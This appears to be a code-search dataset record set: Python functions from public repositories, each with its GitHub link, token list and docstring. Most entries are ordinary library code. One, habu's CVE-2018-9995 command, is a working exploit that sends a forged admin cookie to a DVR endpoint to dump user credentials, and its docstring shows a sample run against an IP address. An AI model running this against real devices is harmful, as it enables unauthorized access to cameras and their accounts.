[ "Add", "workshift", "variables", "to", "all", "dictionaries", "passed", "to", "templates", "." ]
python
train
spacetelescope/drizzlepac
drizzlepac/imageObject.py
https://github.com/spacetelescope/drizzlepac/blob/15bec3c929a6a869d9e71b9398ced43ede0620f1/drizzlepac/imageObject.py#L617-L629
def getskyimg(self, chip):
    """
    Notes
    =====
    Return an array representing the sky image for the detector.

    The value of the sky is what would actually be subtracted from
    the exposure by the skysub step.

    :units: electrons
    """
    chip_info = self._image[self.scienceExt, chip]
    # Uniform plane shaped/typed like the science image, scaled by the
    # sky value that was subtracted from this chip.
    flat = np.ones(chip_info.image_shape, dtype=chip_info.image_dtype)
    return flat * chip_info.subtractedSky
[ "def", "getskyimg", "(", "self", ",", "chip", ")", ":", "sci_chip", "=", "self", ".", "_image", "[", "self", ".", "scienceExt", ",", "chip", "]", "return", "np", ".", "ones", "(", "sci_chip", ".", "image_shape", ",", "dtype", "=", "sci_chip", ".", "i...
Notes ===== Return an array representing the sky image for the detector. The value of the sky is what would actually be subtracted from the exposure by the skysub step. :units: electrons
[ "Notes", "=====", "Return", "an", "array", "representing", "the", "sky", "image", "for", "the", "detector", ".", "The", "value", "of", "the", "sky", "is", "what", "would", "actually", "be", "subtracted", "from", "the", "exposure", "by", "the", "skysub", "s...
python
train
pydata/xarray
xarray/plot/plot.py
https://github.com/pydata/xarray/blob/6d93a95d05bdbfc33fff24064f67d29dd891ab58/xarray/plot/plot.py#L823-L869
def pcolormesh(x, y, z, ax, infer_intervals=None, **kwargs):
    """
    Pseudocolor plot of 2d DataArray

    Wraps :func:`matplotlib:matplotlib.pyplot.pcolormesh`
    """
    x = np.asarray(x)

    # Default for infer_intervals (GH781): on axes with a `projection`
    # attribute only infer edges for 1-d coords; elsewhere always infer.
    if infer_intervals is None:
        infer_intervals = (not hasattr(ax, 'projection')) or x.ndim == 1

    # x matches z's column count either directly or along its second axis.
    x_fits_z = (np.shape(x)[0] == np.shape(z)[1]) or (
        (x.ndim > 1) and (np.shape(x)[1] == np.shape(z)[1]))
    if infer_intervals and x_fits_z:
        if x.ndim == 1:
            x = _infer_interval_breaks(x, check_monotonic=True)
        else:
            # we have to infer the intervals on both axes
            x = _infer_interval_breaks(x, axis=1)
            x = _infer_interval_breaks(x, axis=0)

    if infer_intervals and (np.shape(y)[0] == np.shape(z)[0]):
        if len(y.shape) == 1:
            y = _infer_interval_breaks(y, check_monotonic=True)
        else:
            # we have to infer the intervals on both axes
            y = _infer_interval_breaks(y, axis=1)
            y = _infer_interval_breaks(y, axis=0)

    quadmesh = ax.pcolormesh(x, y, z, **kwargs)

    # pcolormesh picks "round" values for its bounds by default, which
    # leaves ugly surrounding whitespace; clamp limits to the data.
    if not hasattr(ax, 'projection') and x.ndim == 1 and y.ndim == 1:
        # not a cartopy geoaxis
        ax.set_xlim(x[0], x[-1])
        ax.set_ylim(y[0], y[-1])

    return quadmesh
[ "def", "pcolormesh", "(", "x", ",", "y", ",", "z", ",", "ax", ",", "infer_intervals", "=", "None", ",", "*", "*", "kwargs", ")", ":", "# decide on a default for infer_intervals (GH781)", "x", "=", "np", ".", "asarray", "(", "x", ")", "if", "infer_intervals...
Pseudocolor plot of 2d DataArray Wraps :func:`matplotlib:matplotlib.pyplot.pcolormesh`
[ "Pseudocolor", "plot", "of", "2d", "DataArray" ]
python
train
jingw/pyhdfs
pyhdfs.py
https://github.com/jingw/pyhdfs/blob/b382b34f7cb28b41559f5be73102beb1732cd933/pyhdfs.py#L447-L462
def concat(self, target, sources, **kwargs):
    """Concat existing files together.

    For preconditions, see
    https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/filesystem/filesystem.html#void_concatPath_p_Path_sources

    :param target: the path to the target destination.
    :param sources: the paths to the sources to use for the concatenation.
    :type sources: list
    """
    # A bare string would silently be treated as a sequence of characters.
    if isinstance(sources, basestring):
        raise ValueError("sources should be a list")
    # WebHDFS joins the source paths with commas, so commas cannot appear
    # inside any individual path.
    for source_path in sources:
        if ',' in source_path:
            raise NotImplementedError("WebHDFS does not support commas in concat")
    response = self._post(target, 'CONCAT', sources=','.join(sources), **kwargs)
    # A successful CONCAT returns an empty body.
    assert not response.content
[ "def", "concat", "(", "self", ",", "target", ",", "sources", ",", "*", "*", "kwargs", ")", ":", "if", "isinstance", "(", "sources", ",", "basestring", ")", ":", "raise", "ValueError", "(", "\"sources should be a list\"", ")", "if", "any", "(", "','", "in...
Concat existing files together. For preconditions, see https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/filesystem/filesystem.html#void_concatPath_p_Path_sources :param target: the path to the target destination. :param sources: the paths to the sources to use for the concatenation. :type sources: list
[ "Concat", "existing", "files", "together", "." ]
python
train
bitesofcode/projexui
projexui/widgets/xorbrecordedit.py
https://github.com/bitesofcode/projexui/blob/f18a73bec84df90b034ca69b9deea118dbedfc4d/projexui/widgets/xorbrecordedit.py#L222-L248
def setRecord(self, record):
    """
    Sets the record instance for this widget to the inputed record.

    :param      record | <orb.Table>
    """
    self._record = record
    if not record:
        return

    self.setModel(record.__class__)
    schema = self.model().schema()

    # Push each record value into its matching column editor, warning
    # about editors bound to columns the schema does not define.
    for editor in self.findChildren(XOrbColumnEdit):
        name = editor.columnName()
        if not schema.column(name):
            logger.warning('%s is not a valid column of %s.' % \
                           (name, schema.name()))
            continue
        editor.setValue(record.recordValue(name))
[ "def", "setRecord", "(", "self", ",", "record", ")", ":", "self", ".", "_record", "=", "record", "if", "(", "not", "record", ")", ":", "return", "self", ".", "setModel", "(", "record", ".", "__class__", ")", "schema", "=", "self", ".", "model", "(", ...
Sets the record instance for this widget to the inputed record. :param record | <orb.Table>
[ "Sets", "the", "record", "instance", "for", "this", "widget", "to", "the", "inputed", "record", ".", ":", "param", "record", "|", "<orb", ".", "Table", ">" ]
python
train
bmwcarit/zubbi
zubbi/utils.py
https://github.com/bmwcarit/zubbi/blob/b99dfd6113c0351f13876f4172648c2eb63468ba/zubbi/utils.py#L44-L59
def prettydate(date):
    """Return the relative timeframe between the given date and now.

    e.g. 'Just now', 'x days ago', 'x hours ago', ...
    When the difference is greater than 7 days, the timestamp will be
    returned instead.

    :param date: an aware :class:`datetime.datetime` (compared against UTC now).
    :returns: the formatted timestamp (``'%d. %b %Y'``) when *date* is more
        than 7 days old, otherwise a humanized relative string.
    """
    # BUG FIX: the docstring was previously placed *after* the first
    # statement, making it a no-op string expression and leaving the
    # function without a __doc__; it now sits at the top.
    now = datetime.now(timezone.utc)
    diff = now - date

    # Show the timestamp rather than the relative timeframe when the
    # difference is greater than 7 days
    if diff.days > 7:
        return date.strftime("%d. %b %Y")

    return arrow.get(date).humanize()
[ "def", "prettydate", "(", "date", ")", ":", "now", "=", "datetime", ".", "now", "(", "timezone", ".", "utc", ")", "diff", "=", "now", "-", "date", "# Show the timestamp rather than the relative timeframe when the difference", "# is greater than 7 days", "if", "diff", ...
Return the relative timeframe between the given date and now. e.g. 'Just now', 'x days ago', 'x hours ago', ... When the difference is greater than 7 days, the timestamp will be returned instead.
[ "Return", "the", "relative", "timeframe", "between", "the", "given", "date", "and", "now", "." ]
python
train
collectiveacuity/labPack
labpack/location/find.py
https://github.com/collectiveacuity/labPack/blob/52949ece35e72e3cc308f54d9ffa6bfbd96805b8/labpack/location/find.py#L296-L366
def update_positions(self):

    ''' a method to update the latest position of all users being tracked

    :return: dictionary with user_id keys and location/time dictionary values

    NOTE:   self.positions is updated with position details

    {
        'user_id': {
            'time': 0.0,
            'location': 'location.id'
        }
    }
    '''

    # construct the list of tracked users
    user_list = list(self.positions.keys())

    # return empty result when nothing is tracked
    if not user_list:
        return self.positions

    # compose request
    import requests
    url = self.endpoint + '/location'
    from labpack.records.time import labDT

    while user_list:

        # batch requests: at most 50 users per query
        user_batch = user_list[:50]
        params = {
            'group': self.group_name,
            'users': ','.join(user_batch),
            'n': 1
        }
        response = requests.get(url, params=params)

        # ingest the latest position reported for each user in the batch
        response_details = response.json()
        if 'users' in response_details:
            for key, entries in response_details['users'].items():
                if key not in user_batch:
                    continue
                position_details = {}
                for entry in entries:
                    if 'time' in entry and 'location' in entry:
                        # normalize the server timestamp to ISO-8601 before
                        # converting it to an epoch float
                        time_string = entry['time']
                        time_string = time_string.replace(' +0000 UTC', 'Z')
                        time_string = time_string.replace(' ', 'T')
                        position_details = {
                            'time': labDT.fromISO(time_string).epoch(),
                            'location': entry['location']
                        }
                        break
                self.positions[key] = position_details

        # advance to the next batch.
        # BUG FIX: the previous code sliced user_list[50:0], which is always
        # empty, so every user past the first 100 was silently dropped.
        user_list = user_list[50:]

    return self.positions
[ "def", "update_positions", "(", "self", ")", ":", "# construct user list", "user_list", "=", "[", "]", "for", "key", "in", "self", ".", "positions", ".", "keys", "(", ")", ":", "user_list", ".", "append", "(", "key", ")", "# return empty result", "if", "no...
a method to update the latest position of all users being tracked :return: dictionary with user_id keys and location/time dictionary values NOTE: self.players is updated with position details { 'user_id': { 'time': 0.0, 'location': 'location.id' } }
[ "a", "method", "to", "update", "the", "latest", "position", "of", "all", "users", "being", "tracked", ":", "return", ":", "dictionary", "with", "user_id", "keys", "and", "location", "/", "time", "dictionary", "values", "NOTE", ":", "self", ".", "players", ...
python
train
signalfx/signalfx-python
signalfx/signalflow/ws.py
https://github.com/signalfx/signalfx-python/blob/650eb9a2b301bcc795e4e3a8c031574ade69849d/signalfx/signalflow/ws.py#L146-L155
def opened(self):
    """Handler called when the WebSocket connection is opened. The first
    thing to do then is to authenticate ourselves."""
    # The server expects an authentication message before anything else.
    auth_message = {
        'type': 'authenticate',
        'token': self._token,
        'userAgent': '{} ws4py/{}'.format(version.user_agent,
                                          ws4py.__version__),
    }
    self.send(json.dumps(auth_message))
[ "def", "opened", "(", "self", ")", ":", "request", "=", "{", "'type'", ":", "'authenticate'", ",", "'token'", ":", "self", ".", "_token", ",", "'userAgent'", ":", "'{} ws4py/{}'", ".", "format", "(", "version", ".", "user_agent", ",", "ws4py", ".", "__ve...
Handler called when the WebSocket connection is opened. The first thing to do then is to authenticate ourselves.
[ "Handler", "called", "when", "the", "WebSocket", "connection", "is", "opened", ".", "The", "first", "thing", "to", "do", "then", "is", "to", "authenticate", "ourselves", "." ]
python
train
spacetelescope/stsci.tools
lib/stsci/tools/teal.py
https://github.com/spacetelescope/stsci.tools/blob/9a022503ad24ca54ce83331482dfa3ff6de9f403/lib/stsci/tools/teal.py#L343-L361
def execEmbCode(SCOPE, NAME, VAL, TEAL, codeStr):
    """ .cfgspc embedded code execution is done here, in a relatively confined
    space.  The variables available to the code to be executed are:
          SCOPE, NAME, VAL, PARENT, TEAL
    The code string itself is expected to set a var named OUT """
    # Python 3 requires an explicit namespace dict for exec to reliably
    # observe assignments (http://bugs.python.org/issue4831).  The embedded
    # code sees SCOPE, NAME, VAL, PARENT, TEAL via our locals snapshot and
    # must set OUT there.
    PARENT = TEAL.top if TEAL else None
    OUT = None
    local_ns = locals()  # snapshot that exec() populates with OUT
    exec(codeStr, globals(), local_ns)
    return local_ns['OUT']
[ "def", "execEmbCode", "(", "SCOPE", ",", "NAME", ",", "VAL", ",", "TEAL", ",", "codeStr", ")", ":", "# This was all we needed in Python 2.x", "# OUT = None", "# exec codeStr", "# return OUT", "# In Python 3 (& 2.x) be more explicit: http://bugs.python.org/issue4831", "PA...
.cfgspc embedded code execution is done here, in a relatively confined space. The variables available to the code to be executed are: SCOPE, NAME, VAL, PARENT, TEAL The code string itself is expected to set a var named OUT
[ ".", "cfgspc", "embedded", "code", "execution", "is", "done", "here", "in", "a", "relatively", "confined", "space", ".", "The", "variables", "available", "to", "the", "code", "to", "be", "executed", "are", ":", "SCOPE", "NAME", "VAL", "PARENT", "TEAL", "Th...
python
train
isislovecruft/python-gnupg
pretty_bad_protocol/_parsers.py
https://github.com/isislovecruft/python-gnupg/blob/784571449032e811587249743e183fc5e908a673/pretty_bad_protocol/_parsers.py#L883-L896
def _handle_status(self, key, value): """Parse a status code from the attached GnuPG process. :raises: :exc:`~exceptions.ValueError` if the status message is unknown. """ if key in ("USERID_HINT", "NEED_PASSPHRASE", "GET_HIDDEN", "SIGEXPIRED", "KEYEXPIRED", "GOOD_PASSPHRASE", "GOT_IT", "GET_LINE"): pass elif key in ("BAD_PASSPHRASE", "MISSING_PASSPHRASE"): self.status = key.replace("_", " ").lower() else: self.status = 'failed' raise ValueError("Unknown status message: %r" % key)
[ "def", "_handle_status", "(", "self", ",", "key", ",", "value", ")", ":", "if", "key", "in", "(", "\"USERID_HINT\"", ",", "\"NEED_PASSPHRASE\"", ",", "\"GET_HIDDEN\"", ",", "\"SIGEXPIRED\"", ",", "\"KEYEXPIRED\"", ",", "\"GOOD_PASSPHRASE\"", ",", "\"GOT_IT\"", "...
Parse a status code from the attached GnuPG process. :raises: :exc:`~exceptions.ValueError` if the status message is unknown.
[ "Parse", "a", "status", "code", "from", "the", "attached", "GnuPG", "process", "." ]
python
train
reingart/pyafipws
wslpg.py
https://github.com/reingart/pyafipws/blob/ee87cfe4ac12285ab431df5fec257f103042d1ab/wslpg.py#L1389-L1415
def AjustarLiquidacionUnificado(self): "Ajustar Liquidación Primaria de Granos" # limpiar estructuras no utilizadas (si no hay deducciones / retenciones) for k in ('ajusteDebito', 'ajusteCredito'): if not any(self.ajuste[k].values()): del self.ajuste[k] else: if not self.ajuste[k]['deducciones']: del self.ajuste[k]['deducciones'] if not self.ajuste[k]['retenciones']: del self.ajuste[k]['retenciones'] # llamar al webservice: ret = self.client.liquidacionAjustarUnificado( auth={ 'token': self.Token, 'sign': self.Sign, 'cuit': self.Cuit, }, **self.ajuste ) # analizar el resultado: ret = ret['ajusteUnifReturn'] self.__analizar_errores(ret) if 'ajusteUnificado' in ret: aut = ret['ajusteUnificado'] self.AnalizarAjuste(aut) return True
[ "def", "AjustarLiquidacionUnificado", "(", "self", ")", ":", "# limpiar estructuras no utilizadas (si no hay deducciones / retenciones)", "for", "k", "in", "(", "'ajusteDebito'", ",", "'ajusteCredito'", ")", ":", "if", "not", "any", "(", "self", ".", "ajuste", "[", "k...
Ajustar Liquidación Primaria de Granos
[ "Ajustar", "Liquidación", "Primaria", "de", "Granos" ]
python
train
fantasticfears/kgekit
kgekit/data.py
https://github.com/fantasticfears/kgekit/blob/5e464e1fc3ae9c7e216f6dd94f879a967d065247/kgekit/data.py#L69-L105
def shrink_indexes_in_place(self, triples):
    """Uses a union find to find segment.

    Rewrites each triple to use canonical (root) entity/relation ids,
    then compacts ``self._ents``/``self._rels`` so only ids that still
    occur survive, densely renumbered.  Mutates ``triples``, both bidict
    maps and the ``self._ent_id``/``self._rel_id`` counters in place.
    """
    _ent_roots = self.UnionFind(self._ent_id)
    _rel_roots = self.UnionFind(self._rel_id)
    # Register every entity/relation id that actually occurs.
    for t in triples:
        _ent_roots.add(t.head)
        _ent_roots.add(t.tail)
        _rel_roots.add(t.relation)
    # Rewrite each triple using the canonical root ids.
    for i, t in enumerate(triples):
        h = _ent_roots.find(t.head)
        r = _rel_roots.find(t.relation)
        # NOTE(review): `t` is reused here as the canonical tail id,
        # shadowing the loop variable — works, but confirm intent.
        t = _ent_roots.find(t.tail)
        triples[i] = kgedata.TripleIndex(h, r, t)
    # Compact entity ids: drop unused entries, renumber survivors densely.
    ents = bidict()
    available_ent_idx = 0
    for previous_idx, ent_exist in enumerate(_ent_roots.roots()):
        if not ent_exist:
            self._ents.inverse.pop(previous_idx)
        else:
            ents[self._ents.inverse[previous_idx]] = available_ent_idx
            available_ent_idx += 1
    # Same compaction for relation ids.
    rels = bidict()
    available_rel_idx = 0
    for previous_idx, rel_exist in enumerate(_rel_roots.roots()):
        if not rel_exist:
            self._rels.inverse.pop(previous_idx)
        else:
            rels[self._rels.inverse[previous_idx]] = available_rel_idx
            available_rel_idx += 1
    self._ents = ents
    self._rels = rels
    self._ent_id = available_ent_idx
    self._rel_id = available_rel_idx
[ "def", "shrink_indexes_in_place", "(", "self", ",", "triples", ")", ":", "_ent_roots", "=", "self", ".", "UnionFind", "(", "self", ".", "_ent_id", ")", "_rel_roots", "=", "self", ".", "UnionFind", "(", "self", ".", "_rel_id", ")", "for", "t", "in", "trip...
Uses a union find to find segment.
[ "Uses", "a", "union", "find", "to", "find", "segment", "." ]
python
valid
alefnula/tea
tea/shell/__init__.py
https://github.com/alefnula/tea/blob/f5a0a724a425ec4f9dd2c7fe966ef06faf3a15a3/tea/shell/__init__.py#L276-L297
def move(source, destination):
    """Move a file or directory (recursively) to another location.

    If the destination is on our current file system, then simply use
    rename. Otherwise, copy source to the destination and then remove
    source.

    Args:
        source (str): Source file or directory (file or directory to move).
        destination (str): Destination file or directory (where to move).

    Returns:
        bool: True if the operation is successful, False otherwise.
    """
    logger.info("Move: %s -> %s" % (source, destination))
    try:
        # Make sure the destination's parent directory exists first.
        __create_destdir(destination)
        shutil.move(source, destination)
    except Exception:
        # Best-effort API: log the failure and report it via the return value.
        logger.exception("Failed to Move: %s -> %s" % (source, destination))
        return False
    else:
        return True
[ "def", "move", "(", "source", ",", "destination", ")", ":", "logger", ".", "info", "(", "\"Move: %s -> %s\"", "%", "(", "source", ",", "destination", ")", ")", "try", ":", "__create_destdir", "(", "destination", ")", "shutil", ".", "move", "(", "source", ...
Move a file or directory (recursively) to another location. If the destination is on our current file system, then simply use rename. Otherwise, copy source to the destination and then remove source. Args: source (str): Source file or directory (file or directory to move). destination (str): Destination file or directory (where to move). Returns: bool: True if the operation is successful, False otherwise.
[ "Move", "a", "file", "or", "directory", "(", "recursively", ")", "to", "another", "location", "." ]
python
train
portantier/habu
habu/cli/cmd_cve_2018_9995.py
https://github.com/portantier/habu/blob/87091e389dc6332fe1b82830c22b2eefc55816f2/habu/cli/cmd_cve_2018_9995.py#L14-L67
def cmd_cve_2018_9995(ip, port, verbose):
    """Exploit the CVE-2018-9995 vulnerability, present on various DVR systems.

    Note: Based on the original code from Ezequiel Fernandez (@capitan_alfa).

    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9995

    Example:

    \b
    $ python habu.cve.2018-9995 82.202.102.42
    [
        {
            "uid": "admin",
            "pwd": "securepassword",
            "role": 2,
            "enmac": 0,
            "mac": "00:00:00:00:00:00",
            "playback": 4294967295,
            "view": 4294967295,
            "rview": 4294967295,
            "ptz": 4294967295,
            "backup": 4294967295,
            "opt": 4294967295
        }
    ]
    """
    # The vulnerable endpoint leaks the user list when the request carries
    # a 'uid=admin' cookie.
    base_url = 'http://' + ip + ':' + str(port)
    target = base_url + '/device.rsp?opt=user&cmd=list'

    headers = {
        'Host': ip,
        'User-Agent': 'Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Languag': 'es-AR,en-US;q=0.7,en;q=0.3',
        'Connection': 'close',
        'Content-Type': 'text/html',
        'Cookie': 'uid=admin',
    }

    try:
        response = requests.get(target, headers=headers, timeout=10)
    except Exception as e:
        print('Exception:', e)
        sys.exit(1)

    try:
        device_info = response.json()
    except Exception as e:
        print('Exception:', e)
        sys.exit(1)

    print(json.dumps(device_info["list"], indent=4))
[ "def", "cmd_cve_2018_9995", "(", "ip", ",", "port", ",", "verbose", ")", ":", "url", "=", "'http://'", "+", "ip", "+", "':'", "+", "str", "(", "port", ")", "fullhost", "=", "url", "+", "'/device.rsp?opt=user&cmd=list'", "headers", "=", "{", "'Host'", ":"...
Exploit the CVE-2018-9995 vulnerability, present on various DVR systems. Note: Based on the original code from Ezequiel Fernandez (@capitan_alfa). Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9995 Example: \b $ python habu.cve.2018-9995 82.202.102.42 [ { "uid": "admin", "pwd": "securepassword", "role": 2, "enmac": 0, "mac": "00:00:00:00:00:00", "playback": 4294967295, "view": 4294967295, "rview": 4294967295, "ptz": 4294967295, "backup": 4294967295, "opt": 4294967295 } ]
[ "Exploit", "the", "CVE", "-", "2018", "-", "9995", "vulnerability", "present", "on", "various", "DVR", "systems", "." ]
python
train
spyder-ide/spyder
spyder/plugins/editor/lsp/transport/main.py
https://github.com/spyder-ide/spyder/blob/f76836ce1b924bcc4efd3f74f2960d26a4e528e0/spyder/plugins/editor/lsp/transport/main.py#L102-L107
def restore(self):
    """Restore signal handlers to their original settings."""
    handlers = [
        (signal.SIGINT, self.original_sigint),
        (signal.SIGTERM, self.original_sigterm),
    ]
    # SIGBREAK only exists on Windows.
    if os.name == 'nt':
        handlers.append((signal.SIGBREAK, self.original_sigbreak))
    for signum, handler in handlers:
        signal.signal(signum, handler)
[ "def", "restore", "(", "self", ")", ":", "signal", ".", "signal", "(", "signal", ".", "SIGINT", ",", "self", ".", "original_sigint", ")", "signal", ".", "signal", "(", "signal", ".", "SIGTERM", ",", "self", ".", "original_sigterm", ")", "if", "os", "."...
Restore signal handlers to their original settings.
[ "Restore", "signal", "handlers", "to", "their", "original", "settings", "." ]
python
train
fitnr/convertdate
convertdate/mayan.py
https://github.com/fitnr/convertdate/blob/e920f168a87f99183b0aa7290d6c3af222582d43/convertdate/mayan.py#L176-L194
def next_haab(month, jd):
    '''For a given haab month and a julian day count, find the next start of
    that month on or after the JDC'''
    if jd < EPOCH:
        raise IndexError("Input day is before Mayan epoch.")

    current_day, current_month = to_haab(jd)

    if current_month == month:
        # Already inside the target month: step back to its day 1.
        offset = 1 - current_day
    else:
        # Days between the current haab position and day 1 of the target
        # month, wrapped around the 365-day haab year.
        offset = (_haab_count(1, month) - _haab_count(current_day, current_month)) % 365

    return jd + offset
[ "def", "next_haab", "(", "month", ",", "jd", ")", ":", "if", "jd", "<", "EPOCH", ":", "raise", "IndexError", "(", "\"Input day is before Mayan epoch.\"", ")", "hday", ",", "hmonth", "=", "to_haab", "(", "jd", ")", "if", "hmonth", "==", "month", ":", "day...
For a given haab month and a julian day count, find the next start of that month on or after the JDC
[ "For", "a", "given", "haab", "month", "and", "a", "julian", "day", "count", "find", "the", "next", "start", "of", "that", "month", "on", "or", "after", "the", "JDC" ]
python
train
miLibris/flask-rest-jsonapi
flask_rest_jsonapi/resource.py
https://github.com/miLibris/flask-rest-jsonapi/blob/ecc8f2cd2b54cc0bfae7acd6cffcda0ba1140c43/flask_rest_jsonapi/resource.py#L235-L286
def patch(self, *args, **kwargs):
    """Update an object.

    Loads the request payload through the (partial) marshmallow schema,
    validates the JSON API ``data.id`` against the URL identifier, applies
    the patch through the data layer and returns the serialized result.
    """
    json_data = request.get_json() or {}

    qs = QSManager(request.args, self.schema)
    # Per-resource schema kwargs; PATCH always loads partially.
    schema_kwargs = getattr(self, 'patch_schema_kwargs', dict())
    schema_kwargs.update({'partial': True})

    self.before_marshmallow(args, kwargs)

    schema = compute_schema(self.schema,
                            schema_kwargs,
                            qs,
                            qs.include)

    try:
        data, errors = schema.load(json_data)
    except IncorrectTypeError as e:
        # JSON API type mismatch -> 409 Conflict, annotated per error.
        errors = e.messages
        for error in errors['errors']:
            error['status'] = '409'
            error['title'] = "Incorrect type"
        return errors, 409
    except ValidationError as e:
        # Schema validation failure -> 422 Unprocessable Entity.
        errors = e.messages
        for message in errors['errors']:
            message['status'] = '422'
            message['title'] = "Validation error"
        return errors, 422

    # marshmallow may also report errors without raising.
    if errors:
        for error in errors['errors']:
            error['status'] = "422"
            error['title'] = "Validation error"
        return errors, 422

    if 'id' not in json_data['data']:
        raise BadRequest('Missing id in "data" node',
                         source={'pointer': '/data/id'})
    # The payload id must match the identifier in the URL.
    if (str(json_data['data']['id']) !=
            str(kwargs[getattr(self._data_layer, 'url_field', 'id')])):
        raise BadRequest('Value of id does not match the resource identifier in url',
                         source={'pointer': '/data/id'})

    self.before_patch(args, kwargs, data=data)

    obj = self.update_object(data, qs, kwargs)

    result = schema.dump(obj).data

    final_result = self.after_patch(result)

    return final_result
[ "def", "patch", "(", "self", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "json_data", "=", "request", ".", "get_json", "(", ")", "or", "{", "}", "qs", "=", "QSManager", "(", "request", ".", "args", ",", "self", ".", "schema", ")", "schem...
Update an object
[ "Update", "an", "object" ]
python
train
bcbio/bcbio-nextgen
bcbio/variation/qsnp.py
https://github.com/bcbio/bcbio-nextgen/blob/6a9348c0054ccd5baffd22f1bb7d0422f6978b20/bcbio/variation/qsnp.py#L31-L53
def run_qsnp(align_bams, items, ref_file, assoc_files, region=None, out_file=None):
    """Run qSNP calling on paired tumor/normal.

    When cleaned regions are available, calls each region separately and
    merges the per-region VCFs; otherwise calls across the whole input.
    Requires a normal BAM, since qSNP is a paired caller.
    """
    if utils.file_exists(out_file):
        # Reuse an already-computed result.
        return out_file
    paired = get_paired_bams(align_bams, items)
    if not paired.normal_bam:
        raise ValueError("qSNP only works on paired samples")

    regions = _clean_regions(items, region)
    if regions:
        region_files = []
        for region in regions:
            out_region_file = out_file.replace(".vcf.gz", _to_str(region) + ".vcf.gz")
            region_files.append(_run_qsnp_paired(align_bams, items, ref_file,
                                                 assoc_files, region,
                                                 out_region_file))
        out_file = combine_variant_files(region_files, out_file, ref_file,
                                         items[0]["config"])
    # After the loop `region` holds the last region (truthy), so this only
    # fires when there was no region restriction at all.
    if not region:
        out_file = _run_qsnp_paired(align_bams, items, ref_file, assoc_files,
                                    region, out_file)
    return out_file
[ "def", "run_qsnp", "(", "align_bams", ",", "items", ",", "ref_file", ",", "assoc_files", ",", "region", "=", "None", ",", "out_file", "=", "None", ")", ":", "if", "utils", ".", "file_exists", "(", "out_file", ")", ":", "return", "out_file", "paired", "="...
Run qSNP calling on paired tumor/normal.
[ "Run", "qSNP", "calling", "on", "paired", "tumor", "/", "normal", "." ]
python
train
pettarin/ipapy
ipapy/ipachar.py
https://github.com/pettarin/ipapy/blob/ede4b3c40636f6eb90068369d31a2e75c7115324/ipapy/ipachar.py#L816-L824
def roundness(self, value):
    """
    Set the roundness of the vowel.

    :param str value: the value to be set; must be ``None`` or one of the
        values in ``DG_V_ROUNDNESS``
    :raises ValueError: if ``value`` is neither ``None`` nor a recognized
        roundness value
    """
    # Idiom fix: `value not in ...` instead of `not value in ...`.
    if (value is not None) and (value not in DG_V_ROUNDNESS):
        raise ValueError("Unrecognized value for roundness: '%s'" % value)
    self.__roundness = value
[ "def", "roundness", "(", "self", ",", "value", ")", ":", "if", "(", "value", "is", "not", "None", ")", "and", "(", "not", "value", "in", "DG_V_ROUNDNESS", ")", ":", "raise", "ValueError", "(", "\"Unrecognized value for roundness: '%s'\"", "%", "value", ")", ...
Set the roundness of the vowel. :param str value: the value to be set
[ "Set", "the", "roundness", "of", "the", "vowel", "." ]
python
train
ARMmbed/yotta
yotta/lib/access_common.py
https://github.com/ARMmbed/yotta/blob/56bc1e56c602fa20307b23fe27518e9cd6c11af1/yotta/lib/access_common.py#L324-L346
def unpackTarballStream(stream, into_directory, hash=None, cache_key=None,
                        origin_info=None):
    ''' Unpack a responses stream that contains a tarball into a directory. If
        a hash is provided, then it will be used as a cache key (for future
        requests you can try to retrieve the key value from the cache first,
        before making the request)
    '''
    # BUG FIX: `hash` and `origin_info` previously used mutable default
    # arguments ({} / dict()), which are shared across calls; use None
    # sentinels instead (backward-compatible for all callers).
    if hash is None:
        hash = {}
    if origin_info is None:
        origin_info = dict()

    cache_key = _encodeCacheKey(cache_key)

    # if the cache is disabled, then use a random cache key even if one was
    # provided, so that the module is not persisted in the cache and its
    # temporary download location is a random key:
    if getMaxCachedModules() == 0:
        cache_key = None

    new_cache_key = _downloadToCache(stream, hash, origin_info)
    unpackFromCache(new_cache_key, into_directory)

    if cache_key is None:
        # if we didn't provide a cache key, there's no point in storing the
        # cache
        removeFromCache(new_cache_key)
    else:
        # otherwise make this file available at the known cache key
        _moveCachedFile(new_cache_key, cache_key)
[ "def", "unpackTarballStream", "(", "stream", ",", "into_directory", ",", "hash", "=", "{", "}", ",", "cache_key", "=", "None", ",", "origin_info", "=", "dict", "(", ")", ")", ":", "cache_key", "=", "_encodeCacheKey", "(", "cache_key", ")", "# if the cache is...
Unpack a responses stream that contains a tarball into a directory. If a hash is provided, then it will be used as a cache key (for future requests you can try to retrieve the key value from the cache first, before making the request)
[ "Unpack", "a", "responses", "stream", "that", "contains", "a", "tarball", "into", "a", "directory", ".", "If", "a", "hash", "is", "provided", "then", "it", "will", "be", "used", "as", "a", "cache", "key", "(", "for", "future", "requests", "you", "can", ...
python
valid
Fantomas42/django-blog-zinnia
zinnia/admin/entry.py
https://github.com/Fantomas42/django-blog-zinnia/blob/b4949304b104a8e1a7a7a0773cbfd024313c3a15/zinnia/admin/entry.py#L294-L300
def close_trackbacks(self, request, queryset): """ Close the trackbacks for selected entries. """ queryset.update(trackback_enabled=False) self.message_user( request, _('Trackbacks are now closed for selected entries.'))
[ "def", "close_trackbacks", "(", "self", ",", "request", ",", "queryset", ")", ":", "queryset", ".", "update", "(", "trackback_enabled", "=", "False", ")", "self", ".", "message_user", "(", "request", ",", "_", "(", "'Trackbacks are now closed for selected entries....
Close the trackbacks for selected entries.
[ "Close", "the", "trackbacks", "for", "selected", "entries", "." ]
python
train
happyleavesaoc/python-limitlessled
limitlessled/group/commands/__init__.py
https://github.com/happyleavesaoc/python-limitlessled/blob/70307c2bf8c91430a99579d2ad18b228ec7a8488/limitlessled/group/commands/__init__.py#L5-L31
